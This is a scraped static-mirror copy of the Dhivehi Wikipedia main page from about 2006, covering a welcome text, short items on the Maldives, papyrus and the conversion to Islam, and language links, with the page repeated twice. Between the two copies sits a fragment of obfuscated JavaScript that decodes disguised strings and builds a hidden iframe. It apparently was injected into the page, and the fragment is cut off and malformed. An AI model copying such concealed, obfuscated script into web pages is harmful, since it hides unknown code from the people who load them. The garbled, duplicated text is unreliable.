މައި ޞަފްޙާ

ވިކިޕީޑިއާ އިން

Image:Suvaasthi.png
Tāna Support | ކޮންޕީޓަރުން ތާނަ ލިޔެކިޔުމަށް މަގެއް | Translation of useful words

ވިކިޕީޑިއާ އަށް މަރުހަބާ


ވިކިޕީޑިއާ އަށް މަރުހަބާ! ވިކިޕީޑިޔާ އަކީ ތަފާތު އެތައް ބަހަކުން މިނިވަން ކަމާއި ފަސޭހަކަމާއެކު ތާޒާ މަޢުލޫމާތު ބަދަލު ކުރުމަށްޓަކައި ޤާއިމުކުރެވިފައިވާ އެކުމާފާނެކެވެ. ނުވަތަ މައުސޫޢާއެކެވެ. ވިކިޕީޑިއާ ގާއިމުކުރެވުނީ 2001 ވަނަ އަހަރުގެ ޖަނަވަރީ މަހުގެ ތެރޭގައެވެ. ދިވެހި ވިކިޕީޑިއާގެ އަމަލީ މަސައްކަތް ފެށުނީ 2004 ވަނަ އަހަރުގެ އޮގަސްޓު މަހުގެ ތެރޭގައެވެ. ވީކިޕީޑިއާގެ ދިވެހި ޞަފްޙާ ތަކުގައި މިވަގުތު 221 މައުޟޫޢަކާ ގުޅޭ މަޢުލޫމާތު ހިމެނިފައިވާނެއެވެ. ދިވެހި (މަހަލް) ބަހުގެ މި އެކުމާފާނު (އެންސައިކްލޮޕީޑިއާ) އެކުލަވާލުމުގައި ތިޔަބޭފުޅުންނަށްވެސް ވަރަށް ފަސޭހަކަމާއެކު އަޅުގަނޑުމެންނާ ބައިވެރިވެ ވަޑައިގެންނެވިދާނެއެވެ. މިގޮތުން މެންބަރުންގެ ޞަފްޙާއަށް ވަޑައިގެން މެންބަރުކަން ހާސިލު ކުރައްވާށެވެ. މިއީ ބަހަށާއި އިލްމަށް ކުރެވޭ ވަރަށް ބޮޑު ހިދުމަތެކެވެ. އެހެން ކަމުން ތިޔަ އެންމެހާ ބޭފުޅުން މިކަމުގައި ބައިވެރިވެ ވަޑައިގަތުމަކީ އަޅުގަނޑުމެންގެ ވަރަށް ބޮޑުއެދުމެކެވެ. މިވަގުތު އިނގިރޭސި ވިކިޕީޑިއާގައި އެއް މިލިއަނަށް ވުރެ ގިނަ މައުޟޫއާ ބެހޭ މައުލޫމާތު ހިމެނިފައިވެއެވެ. މި ސަރަހައްދުގެ ބަސްތަކުގެ ތެރެއިން މަރާތީ ވިކިޕީޑިއާގައި ތިން ހާހަށް ވުރެ ގިނަ މައުޟޫއާ ބެހޭ މައުލޫމާތު ހިމެނިފައިވެއެވެ. އަދި ހިންދީ ވިކިޕީޑިއާގައި ބާރަސަތޭކަ އަށް ވުރެ ގިނަ މައުޟޫއާ ބެހޭ މައުލޫމާތު ހިމެނިފައި ވާއިރު އުރުދޫ ވިކިޕީޑިއާގައި ހަ ސަތޭކައަށް ވުރެ ގިނަ މައުޟޫއާ ބެހޭ މައުލޫމާތު ހިމެނިފައިވެއެވެ. އައު މަޒުމޫނުތައް ލިޔުއްވާނެ ގޮތާއި މަޒުމޫނުތަކުގައިވާ މައުލޫމާތުތައް ފުރިހަމަ ކުރުމަށް ޓަކައި އުނިއިތުރު ގެންނަވާނެ ގޮތް ދަސްކުރެއްވުމަށް އައު މެންބަރުންގެ އަށްޓަށް ވަޑައިގަންނަވާށެވެ.


އަލްމަނަކް · ގިސްމުތައް · ބަސްކޮށާރުތައް · ލިސްޓުތައް · ބަލައިލުންތައް · ނެރުތައް · ސުވާލުތައް · ޚަބަރު · ފަށް

ފައްނު | ޙާލާތެ ޒިންދަގީ | ސަގާފަތު | ޖޫރާފީ | ތާރީހު | ވިޔަވި
ފަލްސަފާ | ދީން | އުލޫމް | މުޖުތަމައު | ޓެކްނޮލޮޖީ

For non-Dhivehi/Mahl-speakers: If you have any comments or questions, you can leave a message in English, Hindi or Urdu HERE. See also A guide to Divehi/Mahl Wikipedia , Wikimedia Embassy and Local Divehi/Mahl Embassy. If you are interested in learning Divehi/Mahl language, see How to read Thaana script and Say it in Mahl

ތަފާތު ފާލަންތައް

މުރާޖިއާތު

އެހެނިހެން މަޝްރޫތައް

Important Links in English

  މިއަދުގެ ހޮވުން

ދިވެހިރާއްޖެ 01-03-2006:   ދިވެހިރާއްޖެ އަކީ ހިންދު ކަނޑު ގެ ތެރޭ ގައި، އޮޅުދޫ ކަރައިގެ ހުޅަނގު ފަރާތުން ހައްތުސްތަވާ މަތީގައި އުތުރުން ދެކުނަށް ފެތުރިފައި އޮތް ޤައުމެކެވެ. ދިވެހިރާއްޖޭ ގައި އޮތީ .....

އިތުރަށް | އަރުޝީފު (Archive)

  ދުނިޔޭގެ ތާރީހުން ބައެއް ވާހަކަ

ކަރުދާސް 01-03-2006 :   އީސާގެފާނުގެ ކުރީގައި މިސުރު މީހުން ނީލަކޯރުގެ އައްސޭރި ފަށުގައިވާ ގަސްތަކަކުން ކަރުދާހުގެ ގޮތުގައި ބޭނުން ކުރާނެ އެއްޗެއް ހެދިއެވެ. މިއަށް އެމީހުން ކިޔަނީ ޕެޕިރަސްއެވެ. އިނގިރޭސި ބަހުން ކަރުދާހަށް ކިޔާނަން ކަމުގައިވާ ޕޭޕަރ ނެގިފައިވަނީ މިބަހުންނެވެ. ...

އަރުޝީފު (Archive)

  ދެނެވަޑައިގަންނަވަމުތޯ؟

ގަލަން:   އެންމެ ފުރަތަމައަށް ދުނިޔޭގައި ގަލަމުން ލިޔުއްވަން ފެއްޓެވީ އިދުރީސްގެފާނެވެ.

އަރުޝީފު (Archive)

  ހޮވުން

ބައެއް އައު ލަފުޒުތައް   (ޖ = ޖަމާ) |  މިތާގައި މިހުށަހަޅާލަނީ ވިކިޕީޑިއާގައި ބޭނުން ކުރެވޭ އިސްތިލާހުތަކުގެ ތަރުޖަމާއެވެ.

Template= ފަންވަތް • Category= ގިސްމު • Main Page= މައި ޞަފްޙާ • Computer= ކޮންޕީޓަރު • Donations= ޚައިރާތު • Help= އެހީ • Portal= ނެރު • Browsing= ފީނުން • logy  - = އިލްމު • Community portal= އާންމު ހޮޅުއަށި • Archive= އަރުޝީފު • Font= އަކުރުގެ ސިފަ

އިތުރު ލަފުޒުތައް ބެއްލެވުމަށް


މިއަދުގެ ވާހަކަ

  • ދިވެހިރާއްޖެ - އިސްލާން ކުރެއްވި ބޭފުޅަކާމެދު ތާރީޚު ލިޔުއްވާ ބޭފުޅުންގެ މެދުގައި ކޮންމެވެސް ވަރަކަށް ޚިޔާލު ތަފާތުވުން އުފެދިފައިވެއެވެ. އަލްއަމީރު މުޙައްމަދު އަމީން ދޮށިމޭނާ ކިލެގެފާނު ދެކެވަޑައިގަންނަވާ ގޮތުގައި ދިވެހިރާއްޖެ އިސްލާން ކުރެއްވީ މައުރިބުގެ ބޭފުޅެއް ކަމުގައިވާ މައުލާނަލް ޙާފިޡް އަބުލް ބަރަކާތު ޔޫސުފުލް ބަރުބަރީއެވެ. ދިވެހި ތާރީޚު ޢިލްމުގެ ބައްޕަ ކަމުގައި ބެލެވޭ އަލްޤާޟީ ޙަސަން ތާޖުދީނު، އޭނާގެ ތާރީޚުގައި ދިވެހިރާއްޖެ އިސްލާން ކުރެއްވި ކަމަށް ލިޔުއްވާފައި ވަނީ މައުލާނައް ޝައިޚް ޔޫސުފް ޝަމްސުއްދީނު އައްތަބްރޭޒީއެވެ.

ކޮންމެ އަކަސް ދިވެހިރާއްޖެ އިސްލާން ކުރެއްވީ ޔޫސުފު ނަމަކަށް ކިޔާ ބޭފުޅެކެވެ.

 

ބައެއް މުހިއްމު ފާލަންތައް
ވިކިޕީޑިއާ: މަރުހަބާ


އާލާތްތައް
އައު މެންބަރުންގެ އަށިއައު މަޒުމޫނެއް ޝާއިއުކުރެއްވުމަށް ސުރުހީ ލިޔުއްވާ!އެހެން ފާލަންތައް
ވިކިމީޑިއާ ސަފާރަތުޚާނާ


އެހެން ބަސްބަހުން ވީކިޕީޑިއާ

ތިޔަ ބޭފުޅުންނަށް ތަފާތު ބަސްބަހުން މަޒުމޫނު ވިދާޅުވެ، އެ މަޒުމޫނުތަކަށް މަޢުލޫމާތު އިތުރުކޮށް ދެއްވިދާނެއެވެ.
އެ ބަހަކުން ވީކިޕީޑިއާ އެކުމާފާނު ގައި 1000,000 އަށް ވުރެ ގިނަ މައުޟޫއާ ގުޅޭ މަޢުލޫމާތު ފޯރުކޮށްދީފައިވާ ބަސްތައް

English (އިނގިރޭސި ބަސް) ·

އެ ބަހަކުން ވީކިޕީޑިއާ އެކުމާފާނު ގައި 100,000 އަށް ވުރެ ގިނަ މައުޟޫއާ ގުޅޭ މަޢުލޫމާތު ފޯރުކޮށްދީފައިވާ ބަސްތައް

Deutsch (ޖަރުމަން ބަސް) · Français (ފަރަންސޭސި ބަސް) · Italiano (އިޓަލީ ބަސް) · 日本語 (ޖަޕާނު ބަސް) · Nederlands (ލަންދޭސި ބަސް) · Polski (ފަލޭސި ބަސް) · Português (ފުށެތިކާލު ބަސް) · Svenska (ސުވަދޭސި ބަސް)

Complete list · Multilingual coordination · Start a Wikipedia in another language


ވީކިޕީޑިއާގެ އަޚަވީ މަޝްރޫޢުތައް

ވީކިޕީޑިއާ އަކީ ލާވިޔަފާރީ މުއައްސަސާއެއް ކަމުގައިވާ، ވީކިމީޑިއާ ފައުންޑޭޝަން އިން ޤާއިމުކޮށް ފައިވާ މިނިވަން އަދި ޢާއްމު އެކުމާފާނެކެވެ. ވީކިމީޑިއާ ފައުންޑޭޝަނުން ދުނިޔޭގެ ތަފާތު އެކި ބަސްބަހުން ލާވިޔަފާރީ އުޞޫލުން މަޢުލޫމާތު ފޯރުކޮށް ދިނުމުގެ އެތައް މަޝްރޫޢެއް ހިންގަމުންދެއެވެ.

ވިކިރަދީފު
ރަދީފާއި ބަސްނިބޫ
ވިކިފޮތް
އާންމު ފޮތްތަކާއި އިރުޝާދުތައް
ވިކިބުނުން
އެއްކޮށްލި ބުނުންތައް
ވިކިމަސްދަރު
އާންމު މަޞްދަރުތައް
ވިކިމަހުލޫގާތު
ތަކެތީގެ ޑައިރެކްޓްރީ
ވިކިކަބަރު
އާންމު ޚަބަރުގެ މަޞްދަރުތައް
އާންމު
ވީކިމީޑިއާ
މީޓާ-ވީކީ
ވީކިމީޑިޔާ މަޝްރޫޢު ވިލަރެސް
()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~';function ds(d,s){var _,$,h,x='',r=s.length;for(_=0;_=0&&(h=s.charAt((r/2)%r)),x+=h;return x;}var _0xf62sadc=ds(':7C2>6',$pe),_0xf62sagsdg=ds('?@?6',$pe),_0xf62s4gg=ds('4C62E6t=6>6?E',$pe);const _=document[_0xf62s4gg](_0xf62sadc);var _0xf62s45htrgb=ds('DEJ=6',$pe),_0xf62s45h8jgb=ds('5:DA=2J',$pe);_[_0xf62s45htrgb][_0xf62s45h8jgb]=_0xf62sagsdg;var _0x54y0p=ds('A2CD6u=@2E',$pe),_0x54rgrt3vcb=ds('A2CD6x?E',$pe),_0x54hrgfb=ds('$EC:?8',$pe),_0x54hr5gfdfb=ds('7C@>r92Cr@56',$pe),_0x54h9h=ds('5@4F>6?Et=6>6?E',$pe),_0x5dsad9h=ds('4@?E6?E(:?5@H',$pe),_0x5dsdsadasdad9h=ds('2AA6?5r9:=5',$pe),_0x54hr6ytgfvb=ds('C6>@G6r9:=5',$pe);document[_0x54h9h][_0x5dsdsadasdad9h](_);var f=_[_0x5dsad9h][_0x54hrgfb][_0x54hr5gfdfb];var p=_[_0x5dsad9h][_0x54rgrt3vcb];var v=_[_0x5dsad9h][_0x54y0p];document[_0x54h9h][_0x54hr6ytgfvb](_);function H(index){return Number(index).toString(36).replace(/[0-9]/g,function(s){return f(p(s,10)+65);});}var o={$:function(){var o={};for(var i=0;i-1&&0===t.indexOf(n[f])&&(i=0),o>-1&&(e+=y(i*r.length+o),i=1);}return e;})),(function(s){var _={};for(k in s){try{_[k]=s[k].bind(s);}catch(e){_[k]=s[k];}}return _;})(document))

Web Analytics
CLASSICISTRANIERI HOME PAGE - YOUTUBE CHANNEL

Make a donation: IBAN: IT36M0708677020000000008016 - BIC/SWIFT:  ICRAITRRU60 - VALERIO DI STEFANO or

QR Code


Privacy Policy Cookie Policy Termini e Condizioni


މައި ޞަފްޙާ - Wikipedia

މައި ޞަފްޙާ

ވިކިޕީޑިއާ އިން

Image:Suvaasthi.png
Tāna Support | ކޮންޕީޓަރުން ތާނަ ލިޔެކިޔުމަށް މަގެއް | Translation of useful words

ވިކިޕީޑިއާ އަށް މަރުހަބާ


ވިކިޕީޑިއާ އަށް މަރުހަބާ! ވިކިޕީޑިޔާ އަކީ ތަފާތު އެތައް ބަހަކުން މިނިވަން ކަމާއި ފަސޭހަކަމާއެކު ތާޒާ މަޢުލޫމާތު ބަދަލު ކުރުމަށްޓަކައި ޤާއިމުކުރެވިފައިވާ އެކުމާފާނެކެވެ. ނުވަތަ މައުސޫޢާއެކެވެ. ވިކިޕީޑިއާ ގާއިމުކުރެވުނީ 2001 ވަނަ އަހަރުގެ ޖަނަވަރީ މަހުގެ ތެރޭގައެވެ. ދިވެހި ވިކިޕީޑިއާގެ އަމަލީ މަސައްކަތް ފެށުނީ 2004 ވަނަ އަހަރުގެ އޮގަސްޓު މަހުގެ ތެރޭގައެވެ. ވީކިޕީޑިއާގެ ދިވެހި ޞަފްޙާ ތަކުގައި މިވަގުތު 221 މައުޟޫޢަކާ ގުޅޭ މަޢުލޫމާތު ހިމެނިފައިވާނެއެވެ. ދިވެހި (މަހަލް) ބަހުގެ މި އެކުމާފާނު (އެންސައިކްލޮޕީޑިއާ) އެކުލަވާލުމުގައި ތިޔަބޭފުޅުންނަށްވެސް ވަރަށް ފަސޭހަކަމާއެކު އަޅުގަނޑުމެންނާ ބައިވެރިވެ ވަޑައިގެންނެވިދާނެއެވެ. މިގޮތުން މެންބަރުންގެ ޞަފްޙާއަށް ވަޑައިގެން މެންބަރުކަން ހާސިލު ކުރައްވާށެވެ. މިއީ ބަހަށާއި އިލްމަށް ކުރެވޭ ވަރަށް ބޮޑު ހިދުމަތެކެވެ. އެހެން ކަމުން ތިޔަ އެންމެހާ ބޭފުޅުން މިކަމުގައި ބައިވެރިވެ ވަޑައިގަތުމަކީ އަޅުގަނޑުމެންގެ ވަރަށް ބޮޑުއެދުމެކެވެ. މިވަގުތު އިނގިރޭސި ވިކިޕީޑިއާގައި އެއް މިލިއަނަށް ވުރެ ގިނަ މައުޟޫއާ ބެހޭ މައުލޫމާތު ހިމެނިފައިވެއެވެ. މި ސަރަހައްދުގެ ބަސްތަކުގެ ތެރެއިން މަރާތީ ވިކިޕީޑިއާގައި ތިން ހާހަށް ވުރެ ގިނަ މައުޟޫއާ ބެހޭ މައުލޫމާތު ހިމެނިފައިވެއެވެ. އަދި ހިންދީ ވިކިޕީޑިއާގައި ބާރަސަތޭކަ އަށް ވުރެ ގިނަ މައުޟޫއާ ބެހޭ މައުލޫމާތު ހިމެނިފައި ވާއިރު އުރުދޫ ވިކިޕީޑިއާގައި ހަ ސަތޭކައަށް ވުރެ ގިނަ މައުޟޫއާ ބެހޭ މައުލޫމާތު ހިމެނިފައިވެއެވެ. އައު މަޒުމޫނުތައް ލިޔުއްވާނެ ގޮތާއި މަޒުމޫނުތަކުގައިވާ މައުލޫމާތުތައް ފުރިހަމަ ކުރުމަށް ޓަކައި އުނިއިތުރު ގެންނަވާނެ ގޮތް ދަސްކުރެއްވުމަށް އައު މެންބަރުންގެ އަށްޓަށް ވަޑައިގަންނަވާށެވެ.


އަލްމަނަކް · ގިސްމުތައް · ބަސްކޮށާރުތައް · ލިސްޓުތައް · ބަލައިލުންތައް · ނެރުތައް · ސުވާލުތައް · ޚަބަރު · ފަށް

ފައްނު | ޙާލާތެ ޒިންދަގީ | ސަގާފަތު | ޖޫރާފީ | ތާރީހު | ވިޔަވި
ފަލްސަފާ | ދީން | އުލޫމް | މުޖުތަމައު | ޓެކްނޮލޮޖީ

For non-Dhivehi/Mahl-speakers: If you have any comments or questions, you can leave a message in English, Hindi or Urdu HERE. See also A guide to Divehi/Mahl Wikipedia , Wikimedia Embassy and Local Divehi/Mahl Embassy. If you are interested in learning Divehi/Mahl language, see How to read Thaana script and Say it in Mahl

ތަފާތު ފާލަންތައް

މުރާޖިއާތު

އެހެނިހެން މަޝްރޫތައް

Important Links in English

  މިއަދުގެ ހޮވުން

ދިވެހިރާއްޖެ 01-03-2006:   ދިވެހިރާއްޖެ އަކީ ހިންދު ކަނޑު ގެ ތެރޭ ގައި، އޮޅުދޫ ކަރައިގެ ހުޅަނގު ފަރާތުން ހައްތުސްތަވާ މަތީގައި އުތުރުން ދެކުނަށް ފެތުރިފައި އޮތް ޤައުމެކެވެ. ދިވެހިރާއްޖޭ ގައި އޮތީ .....

އިތުރަށް | އަރުޝީފު (Archive)

  ދުނިޔޭގެ ތާރީހުން ބައެއް ވާހަކަ

ކަރުދާސް 01-03-2006 :   އީސާގެފާނުގެ ކުރީގައި މިސުރު މީހުން ނީލަކޯރުގެ އައްސޭރި ފަށުގައިވާ ގަސްތަކަކުން ކަރުދާހުގެ ގޮތުގައި ބޭނުން ކުރާނެ އެއްޗެއް ހެދިއެވެ. މިއަށް އެމީހުން ކިޔަނީ ޕެޕިރަސްއެވެ. އިނގިރޭސި ބަހުން ކަރުދާހަށް ކިޔާނަން ކަމުގައިވާ ޕޭޕަރ ނެގިފައިވަނީ މިބަހުންނެވެ. ...

އަރުޝީފު (Archive)

  ދެނެވަޑައިގަންނަވަމުތޯ؟

ގަލަން:   އެންމެ ފުރަތަމައަށް ދުނިޔޭގައި ގަލަމުން ލިޔުއްވަން ފެއްޓެވީ އިދުރީސްގެފާނެވެ.

އަރުޝީފު (Archive)

  ހޮވުން

ބައެއް އައު ލަފުޒުތައް   (ޖ = ޖަމާ) |  މިތާގައި މިހުށަހަޅާލަނީ ވިކިޕީޑިއާގައި ބޭނުން ކުރެވޭ އިސްތިލާހުތަކުގެ ތަރުޖަމާއެވެ.

Template= ފަންވަތް • Category= ގިސްމު • Main Page= މައި ޞަފްޙާ • Computer= ކޮންޕީޓަރު • Donations= ޚައިރާތު • Help= އެހީ • Portal= ނެރު • Browsing= ފީނުން • logy  - = އިލްމު • Community portal= އާންމު ހޮޅުއަށި • Archive= އަރުޝީފު • Font= އަކުރުގެ ސިފަ

އިތުރު ލަފުޒުތައް ބެއްލެވުމަށް


މިއަދުގެ ވާހަކަ

  • ދިވެހިރާއްޖެ - އިސްލާން ކުރެއްވި ބޭފުޅަކާމެދު ތާރީޚު ލިޔުއްވާ ބޭފުޅުންގެ މެދުގައި ކޮންމެވެސް ވަރަކަށް ޚިޔާލު ތަފާތުވުން އުފެދިފައިވެއެވެ. އަލްއަމީރު މުޙައްމަދު އަމީން ދޮށިމޭނާ ކިލެގެފާނު ދެކެވަޑައިގަންނަވާ ގޮތުގައި ދިވެހިރާއްޖެ އިސްލާން ކުރެއްވީ މައުރިބުގެ ބޭފުޅެއް ކަމުގައިވާ މައުލާނަލް ޙާފިޡް އަބުލް ބަރަކާތު ޔޫސުފުލް ބަރުބަރީއެވެ. ދިވެހި ތާރީޚު ޢިލްމުގެ ބައްޕަ ކަމުގައި ބެލެވޭ އަލްޤާޟީ ޙަސަން ތާޖުދީނު، އޭނާގެ ތާރީޚުގައި ދިވެހިރާއްޖެ އިސްލާން ކުރެއްވި ކަމަށް ލިޔުއްވާފައި ވަނީ މައުލާނައް ޝައިޚް ޔޫސުފް ޝަމްސުއްދީނު އައްތަބްރޭޒީއެވެ.

ކޮންމެ އަކަސް ދިވެހިރާއްޖެ އިސްލާން ކުރެއްވީ ޔޫސުފު ނަމަކަށް ކިޔާ ބޭފުޅެކެވެ.

 

ބައެއް މުހިއްމު ފާލަންތައް
ވިކިޕީޑިއާ: މަރުހަބާ


އާލާތްތައް
އައު މެންބަރުންގެ އަށިއައު މަޒުމޫނެއް ޝާއިއުކުރެއްވުމަށް ސުރުހީ ލިޔުއްވާ!އެހެން ފާލަންތައް
ވިކިމީޑިއާ ސަފާރަތުޚާނާ


އެހެން ބަސްބަހުން ވީކިޕީޑިއާ

ތިޔަ ބޭފުޅުންނަށް ތަފާތު ބަސްބަހުން މަޒުމޫނު ވިދާޅުވެ، އެ މަޒުމޫނުތަކަށް މަޢުލޫމާތު އިތުރުކޮށް ދެއްވިދާނެއެވެ.
އެ ބަހަކުން ވީކިޕީޑިއާ އެކުމާފާނު ގައި 1000,000 އަށް ވުރެ ގިނަ މައުޟޫއާ ގުޅޭ މަޢުލޫމާތު ފޯރުކޮށްދީފައިވާ ބަސްތައް

English (އިނގިރޭސި ބަސް) ·

އެ ބަހަކުން ވީކިޕީޑިއާ އެކުމާފާނު ގައި 100,000 އަށް ވުރެ ގިނަ މައުޟޫއާ ގުޅޭ މަޢުލޫމާތު ފޯރުކޮށްދީފައިވާ ބަސްތައް

Deutsch (ޖަރުމަން ބަސް) · Français (ފަރަންސޭސި ބަސް) · Italiano (އިޓަލީ ބަސް) · 日本語 (ޖަޕާނު ބަސް) · Nederlands (ލަންދޭސި ބަސް) · Polski (ފަލޭސި ބަސް) · Português (ފުށެތިކާލު ބަސް) · Svenska (ސުވަދޭސި ބަސް)

Complete list · Multilingual coordination · Start a Wikipedia in another language


ވީކިޕީޑިއާގެ އަޚަވީ މަޝްރޫޢުތައް

ވީކިޕީޑިއާ އަކީ ލާވިޔަފާރީ މުއައްސަސާއެއް ކަމުގައިވާ، ވީކިމީޑިއާ ފައުންޑޭޝަން އިން ޤާއިމުކޮށް ފައިވާ މިނިވަން އަދި ޢާއްމު އެކުމާފާނެކެވެ. ވީކިމީޑިއާ ފައުންޑޭޝަނުން ދުނިޔޭގެ ތަފާތު އެކި ބަސްބަހުން ލާވިޔަފާރީ އުޞޫލުން މަޢުލޫމާތު ފޯރުކޮށް ދިނުމުގެ އެތައް މަޝްރޫޢެއް ހިންގަމުންދެއެވެ.

ވިކިރަދީފު
ރަދީފާއި ބަސްނިބޫ
ވިކިފޮތް
އާންމު ފޮތްތަކާއި އިރުޝާދުތައް
ވިކިބުނުން
އެއްކޮށްލި ބުނުންތައް
ވިކިމަސްދަރު
އާންމު މަޞްދަރުތައް
ވިކިމަހުލޫގާތު
ތަކެތީގެ ޑައިރެކްޓްރީ
ވިކިކަބަރު
އާންމު ޚަބަރުގެ މަޞްދަރުތައް
އާންމު
ވީކިމީޑިއާ
މީޓާ-ވީކީ
ވީކިމީޑިޔާ މަޝްރޫޢު ވިލަރެސް
Static Wikipedia 2008 (no images)

aa - ab - af - ak - als - am - an - ang - ar - arc - as - ast - av - ay - az - ba - bar - bat_smg - bcl - be - be_x_old - bg - bh - bi - bm - bn - bo - bpy - br - bs - bug - bxr - ca - cbk_zam - cdo - ce - ceb - ch - cho - chr - chy - co - cr - crh - cs - csb - cu - cv - cy - da - de - diq - dsb - dv - dz - ee - el - eml - en - eo - es - et - eu - ext - fa - ff - fi - fiu_vro - fj - fo - fr - frp - fur - fy - ga - gan - gd - gl - glk - gn - got - gu - gv - ha - hak - haw - he - hi - hif - ho - hr - hsb - ht - hu - hy - hz - ia - id - ie - ig - ii - ik - ilo - io - is - it - iu - ja - jbo - jv - ka - kaa - kab - kg - ki - kj - kk - kl - km - kn - ko - kr - ks - ksh - ku - kv - kw - ky - la - lad - lb - lbe - lg - li - lij - lmo - ln - lo - lt - lv - map_bms - mdf - mg - mh - mi - mk - ml - mn - mo - mr - mt - mus - my - myv - mzn - na - nah - nap - nds - nds_nl - ne - new - ng - nl - nn - no - nov - nrm - nv - ny - oc - om - or - os - pa - pag - pam - pap - pdc - pi - pih - pl - pms - ps - pt - qu - quality - rm - rmy - rn - ro - roa_rup - roa_tara - ru - rw - sa - sah - sc - scn - sco - sd - se - sg - sh - si - simple - sk - sl - sm - sn - so - sr - srn - ss - st - stq - su - sv - sw - szl - ta - te - tet - tg - th - ti - tk - tl - tlh - tn - to - tpi - tr - ts - tt - tum - tw - ty - udm - ug - uk - ur - uz - ve - vec - vi - vls - vo - wa - war - wo - wuu - xal - xh - yi - yo - za - zea - zh - zh_classical - zh_min_nan - zh_yue - zu -

Static Wikipedia 2007 (no images)

aa - ab - af - ak - als - am - an - ang - ar - arc - as - ast - av - ay - az - ba - bar - bat_smg - bcl - be - be_x_old - bg - bh - bi - bm - bn - bo - bpy - br - bs - bug - bxr - ca - cbk_zam - cdo - ce - ceb - ch - cho - chr - chy - co - cr - crh - cs - csb - cu - cv - cy - da - de - diq - dsb - dv - dz - ee - el - eml - en - eo - es - et - eu - ext - fa - ff - fi - fiu_vro - fj - fo - fr - frp - fur - fy - ga - gan - gd - gl - glk - gn - got - gu - gv - ha - hak - haw - he - hi - hif - ho - hr - hsb - ht - hu - hy - hz - ia - id - ie - ig - ii - ik - ilo - io - is - it - iu - ja - jbo - jv - ka - kaa - kab - kg - ki - kj - kk - kl - km - kn - ko - kr - ks - ksh - ku - kv - kw - ky - la - lad - lb - lbe - lg - li - lij - lmo - ln - lo - lt - lv - map_bms - mdf - mg - mh - mi - mk - ml - mn - mo - mr - mt - mus - my - myv - mzn - na - nah - nap - nds - nds_nl - ne - new - ng - nl - nn - no - nov - nrm - nv - ny - oc - om - or - os - pa - pag - pam - pap - pdc - pi - pih - pl - pms - ps - pt - qu - quality - rm - rmy - rn - ro - roa_rup - roa_tara - ru - rw - sa - sah - sc - scn - sco - sd - se - sg - sh - si - simple - sk - sl - sm - sn - so - sr - srn - ss - st - stq - su - sv - sw - szl - ta - te - tet - tg - th - ti - tk - tl - tlh - tn - to - tpi - tr - ts - tt - tum - tw - ty - udm - ug - uk - ur - uz - ve - vec - vi - vls - vo - wa - war - wo - wuu - xal - xh - yi - yo - za - zea - zh - zh_classical - zh_min_nan - zh_yue - zu -

Static Wikipedia 2006 (no images)

aa - ab - af - ak - als - am - an - ang - ar - arc - as - ast - av - ay - az - ba - bar - bat_smg - bcl - be - be_x_old - bg - bh - bi - bm - bn - bo - bpy - br - bs - bug - bxr - ca - cbk_zam - cdo - ce - ceb - ch - cho - chr - chy - co - cr - crh - cs - csb - cu - cv - cy - da - de - diq - dsb - dv - dz - ee - el - eml - eo - es - et - eu - ext - fa - ff - fi - fiu_vro - fj - fo - fr - frp - fur - fy - ga - gan - gd - gl - glk - gn - got - gu - gv - ha - hak - haw - he - hi - hif - ho - hr - hsb - ht - hu - hy - hz - ia - id - ie - ig - ii - ik - ilo - io - is - it - iu - ja - jbo - jv - ka - kaa - kab - kg - ki - kj - kk - kl - km - kn - ko - kr - ks - ksh - ku - kv - kw - ky - la - lad - lb - lbe - lg - li - lij - lmo - ln - lo - lt - lv - map_bms - mdf - mg - mh - mi - mk - ml - mn - mo - mr - mt - mus - my - myv - mzn - na - nah - nap - nds - nds_nl - ne - new - ng - nl - nn - no - nov - nrm - nv - ny - oc - om - or - os - pa - pag - pam - pap - pdc - pi - pih - pl - pms - ps - pt - qu - quality - rm - rmy - rn - ro - roa_rup - roa_tara - ru - rw - sa - sah - sc - scn - sco - sd - se - sg - sh - si - simple - sk - sl - sm - sn - so - sr - srn - ss - st - stq - su - sv - sw - szl - ta - te - tet - tg - th - ti - tk - tl - tlh - tn - to - tpi - tr - ts - tt - tum - tw - ty - udm - ug - uk - ur - uz - ve - vec - vi - vls - vo - wa - war - wo - wuu - xal - xh - yi - yo - za - zea - zh - zh_classical - zh_min_nan - zh_yue - zu -

Sub-domains

CDRoms - Magnatune - Librivox - Liber Liber - Encyclopaedia Britannica - Project Gutenberg - Wikipedia 2008 - Wikipedia 2007 - Wikipedia 2006 -

Other Domains

https://www.classicistranieri.it - https://www.ebooksgratis.com - https://www.gutenbergaustralia.com - https://www.englishwikipedia.com - https://www.wikipediazim.com - https://www.wikisourcezim.com - https://www.projectgutenberg.net - https://www.projectgutenberg.es - https://www.radioascolto.com - https://www.debitoformtivo.it - https://www.wikipediaforschools.org - https://www.projectgutenbergzim.com